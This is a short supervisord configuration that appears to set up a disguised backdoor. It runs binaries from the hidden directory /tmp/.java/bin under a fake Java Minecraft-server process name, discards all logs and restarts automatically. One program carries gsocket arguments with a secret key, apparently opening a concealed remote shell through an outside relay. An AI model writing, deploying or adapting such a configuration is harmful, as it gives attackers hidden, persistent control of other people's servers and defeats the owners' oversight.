[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./java -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./patch.jar server -p 25575 --s
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i1fB3eE2-K9c5A13D9-56C4a9f6X1eC-d9Fd6A2K9-A1c5J1g6K -liq"
command=./java -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./paper.jar 
stdout_logfile=/dev/null
autorestart = true